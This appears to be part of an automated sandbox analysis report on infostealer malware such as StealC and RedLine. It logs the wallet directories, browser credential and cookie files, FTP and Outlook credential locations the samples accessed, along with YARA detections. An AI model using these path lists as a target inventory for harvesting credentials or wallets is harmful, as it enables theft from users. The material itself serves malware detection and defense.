Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000EFC000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000EFC000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000EFC000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000015.00000002.2324820547.0000000000EFC000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000015.00000002.2318326891.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.l

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-wal

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Source: Yara match	File source: 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2220091098.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2587789310.000000000291A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2272318909.000000000317C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: u3uP67496d.exe PID: 7600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 4512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JavvvUmar.exe PID: 7192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 3708, type: MEMORYSTR

Remote Access Functionality

Yara detected CryptOne packer

Source: Yara match

File source: 00000017.00000002.2248416427.0000000003159000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: JavvvUmar.exe PID: 7192, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 3708, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 24.0.penis.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000000.2188308850.0000000000F42000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\penis[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 10.2.gold.exe.41f5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.436080.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.crypted.exe.3b75570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.gold.exe.41f5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.u3uP67496d.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
